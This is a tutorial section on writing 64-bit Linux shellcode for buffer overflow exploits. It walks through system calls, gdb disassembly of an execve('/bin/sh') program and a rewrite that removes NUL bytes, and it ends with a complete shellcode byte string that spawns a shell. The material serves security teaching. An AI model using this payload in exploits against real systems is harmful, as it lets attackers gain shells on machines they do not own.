Designed by thousands of monkeys with hundreds of typewriters
Buffer Overflows and You
for 64-bit Linux systems!

Shellcode

Well that's all just fantastic. But what if we want to be more malicious than just causing a denial of service? What if we want to root the machine?

Well, since we have control of the return address, if we're careful we should be able to overwrite it to point back at our buffer so when the present function returns, the process executes whatever payload we have in the buffer.

How do we go about generating this payload? Well, you'll have to endure some more explaining first.

We talked briefly in the introduction about how the OS is responsible for managing machine resources, and how it provides a number of protection mechanisms to do so. Another one of these mechanisms is a set of instructions that are considered "privileged." That is, they can only be executed when the CPU is in "supervisor" mode. When userland programs execute, the CPU is not in supervisor mode.

Before we get too far along, it should be noted that this section is loosely based on Aleph One's Smashing the Stack for Fun and Profit. [4] You'll note that the approach taken is a bit different, as is the resulting shellcode.

System calls

The only way to enter supervisor mode is to go through predefined entry points in the kernel. One of these points is called a system call. A system call allows a userland program to tell the kernel "Hey, I want you to do something for me or grant me access to some resource."

Let's see how system calls work on x86_64 Linux by taking a look at the kernel source, specifically arch/x86_64/kernel/entry.S where we see the following comment...

/*
 * System call entry. Upto 6 arguments in registers are supported.
 *
 * SYSCALL does not save anything on the stack and does not change the
 * stack pointer.
 */
		
/*
 * Register setup:	
 * rax  system call number
 * rdi  arg0
 * rcx  return address for syscall/sysret, C arg3 
 * rsi  arg1
 * rdx  arg2	
 * r10  arg3 	(--> moved to rcx for C)
 * r8   arg4
 * r9   arg5
 * r11  eflags for syscall/sysret, temporary for C
 * r12-r15,rbp,rbx saved by C code, not touched. 		
 * 
 * Interrupts are off on entry.
 * Only called from user space.
 *
 * XXX	if we had a free scratch register we could save the RSP into the stack frame
 *      and report it properly in ps. Unfortunately we haven't.
 */ 			 		

So to make a system call, you first store the syscall number in RAX and any parameters in RDI, RSI, RDX, R10, R8, and R9 (in that order), and then execute the "syscall" instruction. The result comes back in RAX, and the instruction itself clobbers RCX and R11, as the comment above notes. It's worth noting that this is not how it works on 32-bit x86. On i386, the parameters are passed via EBX, ECX, EDX, etc.; the syscall number is stored in EAX; and the "int" instruction is executed for interrupt 0x80.
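To make that concrete, here is a minimal sketch of the register setup using GCC extended inline assembly. The helper name raw_syscall3 is made up for illustration (it is not part of glibc or the kernel), and the sketch assumes x86_64 Linux and a GCC-compatible compiler.

```c
#include <sys/syscall.h>   /* SYS_getpid and the other syscall numbers */

/* Hypothetical helper (not a libc function): make a system call with up
 * to three arguments by loading the registers described above. */
long raw_syscall3(long nr, long arg0, long arg1, long arg2)
{
    long ret;

    __asm__ volatile (
        "syscall"
        : "=a"(ret)                 /* the kernel's result comes back in RAX */
        : "a"(nr),                  /* RAX = system call number */
          "D"(arg0),                /* RDI = arg0 */
          "S"(arg1),                /* RSI = arg1 */
          "d"(arg2)                 /* RDX = arg2 */
        : "rcx", "r11", "memory"    /* SYSCALL overwrites RCX and R11 */
    );
    return ret;
}
```

For example, raw_syscall3(SYS_getpid, 0, 0, 0) should return the same value as glibc's getpid(). The unused argument registers are simply ignored by system calls that take fewer parameters.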

If this seems painful to you, you're not alone. Since most developers get scared when you mention words like "register" and "interrupt," glibc provides wrapper functions for just about every system call. So instead of doing what was described above, you can instead do something like this...

#include <unistd.h>

int main() {
  execve("/bin/sh", NULL, NULL);
}

The program above is interesting to us, because it represents a pretty useful payload in the context of a buffer overflow attack. It will cause the currently running process to execute /bin/sh and give us a shell. With a shell one can do just about whatever they want.

execve() is a system call, or more precisely it is a wrapper function provided by libc that invokes the "execve" system call. When a "regular" C program wants to make a system call it doesn't usually do it directly.

This time, however, we do want to do it directly, because otherwise we would need to know the starting address of the execve wrapper function. It's even possible that the program we're attacking didn't use glibc, and the wrapper function doesn't even exist in the binary. We'll actually talk about this more in the return-to-libc section.

The code

So how do we go about turning the above program into a payload that we can load into a buffer and execute? Let's start by looking at a little assembly...

$ gcc -static -o shell shell.c
$ gdb ./shell
GNU gdb (GDB) Fedora (7.0.1-44.fc12)
Reading symbols from /home/turkstra/shell...(no debugging symbols found)...done.
(gdb) disassemble main
Dump of assembler code for function main:
0x00000000004003d4 <main+0>:    push   %rbp
0x00000000004003d5 <main+1>:    mov    %rsp,%rbp
0x00000000004003d8 <main+4>:    mov    $0x0,%rdx
0x00000000004003dd <main+9>:    mov    $0x0,%rsi
0x00000000004003e2 <main+14>:   mov    $0x46c610,%rdi
0x00000000004003e7 <main+19>:   callq  0x40ad30 <execve>
0x00000000004003ec <main+24>:   leaveq
0x00000000004003ed <main+25>:   retq
End of assembler dump.

Make sure you add -static to the compiler flags, otherwise instead of directly calling execve you'll encounter code for finding it in the shared library. Regardless, let's break this down some...

0x00000000004003d4 <main+0>:    push   %rbp
0x00000000004003d5 <main+1>:    mov    %rsp,%rbp

If you recall from the DoS section, when a function is called a number of things happen. The code above corresponds to main()'s prologue. We can see that RBP, the old stack frame pointer, is pushed onto the stack. Then RBP is updated to point to the new stack frame (the current stack pointer, in RSP). Next, space for the local variables would be allocated if there were any, and those variables would be set to their initial values, if provided.

0x00000000004003d8 <main+4>:    mov    $0x0,%rdx
0x00000000004003dd <main+9>:    mov    $0x0,%rsi
0x00000000004003e2 <main+14>:   mov    $0x46c610,%rdi
0x00000000004003e7 <main+19>:   callq  0x40ad30 <execve>

Here we're doing a function call to the execve() function provided by glibc. You can see the three arguments are being passed via RDI, RSI, and RDX. RDI gets the address of /bin/sh, RSI and RDX get NULL. Let's look at execve()...

(gdb) disassemble execve
Dump of assembler code for function execve:
0x000000000040ad50 <execve+0>:  mov    $0x3b,%rax
0x000000000040ad55 <execve+5>:  syscall
0x000000000040ad57 <execve+7>:  cmp    $0xfffffffffffff000,%rax
0x000000000040ad5d <execve+13>: ja     0x40ad61 <execve+17>
0x000000000040ad5f <execve+15>: repz retq
0x000000000040ad61 <execve+17>: mov    $0xffffffffffffffd0,%rdx
0x000000000040ad68 <execve+24>: neg    %eax
0x000000000040ad6a <execve+26>: mov    %eax,%fs:(%rdx)
0x000000000040ad6d <execve+29>: or     $0xffffffffffffffff,%eax
0x000000000040ad70 <execve+32>: retq
End of assembler dump.

Well, the only part of interest is really the first two lines. We can see it doesn't even bother with a normal function prologue, because the arguments are already in the correct registers. It simply loads the system call number, 0x3b (59 in decimal), into RAX and executes "syscall". We can verify that this is the correct number by having a look at /usr/include/asm/unistd_64.h. Sure enough...

#define __NR_vfork                              58
__SYSCALL(__NR_vfork, stub_vfork)
#define __NR_execve                             59
__SYSCALL(__NR_execve, stub_execve)
#define __NR_exit                               60
__SYSCALL(__NR_exit, sys_exit)
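As an aside, the rest of the execve() disassembly (everything after "syscall") is just error handling, which our payload doesn't need. Roughly speaking, it checks whether the kernel returned a value in the range -4095 to -1, and if so stores the negated value in errno and returns -1. A rough C sketch of that logic follows; the function name syscall_result_to_libc is invented here, and this is a reading of the disassembly rather than glibc's actual source.

```c
#include <errno.h>

/* Hypothetical sketch of the wrapper's tail: translate a raw kernel
 * return value into the libc convention of "-1 and set errno". */
long syscall_result_to_libc(long raw)
{
    /* Same test as "cmp $0xfffffffffffff000,%rax; ja ...": as an
     * unsigned number, anything above -4096 is a negated errno code. */
    if ((unsigned long)raw > (unsigned long)-4096L) {
        errno = (int)-raw;   /* neg %eax; mov %eax,%fs:(%rdx) */
        return -1;           /* or $0xffffffffffffffff,%eax */
    }
    return raw;              /* success: pass the value through */
}
```

So a raw return of -2 from the kernel would show up to a C program as -1 with errno set to ENOENT.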

Okay, let's pick and choose what we need for our payload...

mov    $0x0,%rdx
mov    $0x0,%rsi
mov    $(address of "/bin/sh"),%rdi
mov    $0x3b,%rax
syscall

Well that looks pretty simple. The first 3 mov's set up the arguments for execve, the fourth mov puts its syscall number in RAX, and then we execute "syscall" to invoke the kernel.

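Not so fast! Presumably we'll include "/bin/sh" as part of the payload. If we do that, though, how can we find its address? We certainly can't hardcode it, since we don't know ahead of time exactly where our buffer will end up in memory. There are a number of tricks you can play at this point. Probably the easiest is to simply push "/bin/sh" onto the stack. Conveniently, the string plus its terminating NUL byte is exactly 8 bytes, so it fits in a single 64-bit register. Once it's pushed, RSP will automatically be updated to point to it. Sounds easy enough, so we end up with...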

mov    $0x0,%rdx
mov    $0x0,%rsi
mov    $0x0068732f6e69622f,%rdi
push   %rdi
mov    %rsp,%rdi
mov    $0x3b,%rax
syscall

You can see we load the ASCII string "/bin/sh" into RDI as a little-endian 64-bit value (which is why the bytes in the immediate read backwards), push it, and then move RSP (which points to the start of our string) into RDI, setting up the first argument for execve.
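If you'd rather not work out the immediate by hand, a few lines of C can do the packing. This is just a sketch; pack_le64 is a hypothetical helper name, and it assumes the string is at most 8 bytes long (anything longer is truncated).

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical helper: pack up to 8 bytes of s into a 64-bit value in
 * little-endian order, so s[0] ends up in the lowest byte. Unused high
 * bytes stay 0, which is what gives us the NUL terminator for free. */
uint64_t pack_le64(const char *s)
{
    uint64_t value = 0;
    size_t len = strlen(s);

    if (len > 8)
        len = 8;   /* only 8 bytes fit in one register */

    for (size_t i = 0; i < len; i++)
        value |= (uint64_t)(unsigned char)s[i] << (8 * i);

    return value;
}
```

Calling pack_le64("/bin/sh") yields 0x0068732f6e69622f, the same constant used in the mov above: 0x2f is '/', 0x62 is 'b', and so on, with the leading 0x00 being the string terminator.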

Well, it would probably be a good idea to test this first. So let's write another simple program...

int main() {
__asm__(
"mov    $0x0,%rdx\n\t"                // arg 3 = NULL
"mov    $0x0,%rsi\n\t"                // arg 2 = NULL
"mov    $0x0068732f6e69622f,%rdi\n\t" // "/bin/sh" plus NUL, little-endian
"push   %rdi\n\t"                     // push "/bin/sh" onto stack
"mov    %rsp,%rdi\n\t"                // arg 1 = stack pointer = start of /bin/sh
"mov    $0x3b,%rax\n\t"               // syscall number = 59
"syscall\n\t"
);
}

Compiling and running it...

$ gcc -o go go.c
$ ./go
[turkstra@corellia turkstra]$ exit
$

Sure enough we get a shell. Now let's figure out the actual byte values for this payload...

The payload

$ gdb go
GNU gdb (GDB) Fedora (7.0.1-44.fc12)
Reading symbols from /home/turkstra/go...(no debugging symbols found)...done.
(gdb) disassemble main
Dump of assembler code for function main:
0x0000000000400474 <main+0>:	push   %rbp
0x0000000000400475 <main+1>:	mov    %rsp,%rbp
0x0000000000400478 <main+4>:	mov    $0x0,%rdx
0x000000000040047f <main+11>:	mov    $0x0,%rsi
0x0000000000400486 <main+18>:	mov    $0x68732f6e69622f,%rdi
0x0000000000400490 <main+28>:	push   %rdi
0x0000000000400491 <main+29>:	mov    %rsp,%rdi
0x0000000000400494 <main+32>:	mov    $0x3b,%rax
0x000000000040049b <main+39>:	syscall 
0x000000000040049d <main+41>:	leaveq 
0x000000000040049e <main+42>:	retq   
End of assembler dump.
(gdb) x/bx main+4
0x400478 <main+4>:	0x48
(gdb) 
0x400479 <main+5>:	0xc7
(gdb) 
0x40047a <main+6>:	0xc2
(gdb) 
0x40047b <main+7>:	0x00
(gdb) 
0x40047c <main+8>:	0x00
(gdb) 

Hold up a second... we can't have 0x00's in our payload, because a lot of the time we'll be trying to exploit strcpy() or something similar, and it will stop copying when it encounters a NUL byte! Let's refactor our code a little bit.
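To see the problem for yourself, here is a small sketch that runs a candidate payload through strcpy() and reports how much of it made it across. The helper name bytes_surviving_strcpy and the 128-byte scratch buffers are arbitrary choices for this illustration.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical helper: copy a payload with strcpy(), the way a
 * vulnerable program might, and return how many bytes arrived. */
size_t bytes_surviving_strcpy(const unsigned char *payload, size_t len)
{
    char src[128] = {0};
    char dest[128] = {0};

    if (len >= sizeof src)
        return 0;                /* too big for this little demo */

    memcpy(src, payload, len);   /* src[len] stays 0, so strcpy() terminates */
    strcpy(dest, src);           /* stops at the first 0x00 byte */
    return strlen(dest);
}
```

Feeding it the seven bytes of our first instruction (0x48 0xc7 0xc2 0x00 0x00 0x00 0x00) returns 3: everything from the first zero byte onward is lost.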

We can get 0x00's by xor'ing a register with itself, and we can replace immediate bytes that are 0 with something else and then use left and right shifts to turn them back into 0's. So, we can turn our code above into this...

int main() {
__asm__(
"xor    %rdx,%rdx\n\t"                // arg 3 = NULL
"mov    %rdx,%rsi\n\t"                // arg 2 = NULL
"mov    $0x1168732f6e69622f,%rdi\n\t" // "/bin/sh" with 0x11 in place of the NUL
"shl    $0x8,%rdi\n\t"                
"shr    $0x8,%rdi\n\t"                // top byte = 0 (8 bits), restoring the NUL
"push   %rdi\n\t"                     // push "/bin/sh" onto stack
"mov    %rsp,%rdi\n\t"                // arg 1 = stack ptr = start of /bin/sh
"mov    $0x111111111111113b,%rax\n\t" // syscall number = 59, padded with 0x11
"shl    $0x38,%rax\n\t"         
"shr    $0x38,%rax\n\t"               // top 7 bytes = 0 (56 bits)
"syscall\n\t"
);
}
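If the shift trick looks like magic, the same arithmetic can be checked in plain C. This sketch uses a made-up helper, clear_top_bits, which assumes the shift count is less than 64. Because the value is unsigned, both shifts are logical, just like shl and shr.

```c
#include <stdint.h>

/* Hypothetical helper mirroring "shl $n,%reg; shr $n,%reg": the left
 * shift pushes the top n bits out of the register, and the right shift
 * brings zeros back in to replace them. Assumes n < 64. */
uint64_t clear_top_bits(uint64_t value, unsigned n)
{
    return (value << n) >> n;
}
```

With the constants from the code above, clear_top_bits(0x1168732f6e69622f, 8) gives 0x0068732f6e69622f and clear_top_bits(0x111111111111113b, 56) gives 0x3b, which are exactly the values the original, zero-laden version loaded directly.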

Okay, now if we go back into gdb and get the values, when it's all said and done we end up with this...

\x48\x31\xd2\x48\x89\xd6\x48\xbf\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe7\x08
\x48\xc1\xef\x08\x57\x48\x89\xe7\x48\xb8\x3b\x11\x11\x11\x11\x11\x11\x11\x48\xc1
\xe0\x38\x48\xc1\xe8\x38\x0f\x05

So now we have glorious 64-bit shellcode.
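Before trusting it, it's worth double-checking that no zero bytes snuck back in. Here is a minimal sketch of such a check; the array name shellcode and the helper first_nul_byte are just names picked for this example.

```c
#include <stddef.h>

/* The payload bytes listed above. As a C string literal it also gets a
 * trailing NUL, so the payload itself is sizeof shellcode - 1 bytes. */
const unsigned char shellcode[] =
    "\x48\x31\xd2\x48\x89\xd6\x48\xbf\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe7\x08"
    "\x48\xc1\xef\x08\x57\x48\x89\xe7\x48\xb8\x3b\x11\x11\x11\x11\x11\x11\x11\x48\xc1"
    "\xe0\x38\x48\xc1\xe8\x38\x0f\x05";

/* Hypothetical helper: return the index of the first 0x00 byte in buf,
 * or -1 if there isn't one. */
long first_nul_byte(const unsigned char *buf, size_t len)
{
    for (size_t i = 0; i < len; i++) {
        if (buf[i] == 0x00)
            return (long)i;
    }
    return -1;
}
```

Calling first_nul_byte(shellcode, sizeof shellcode - 1) returns -1 for this 48-byte payload, so strcpy() and friends should copy the whole thing.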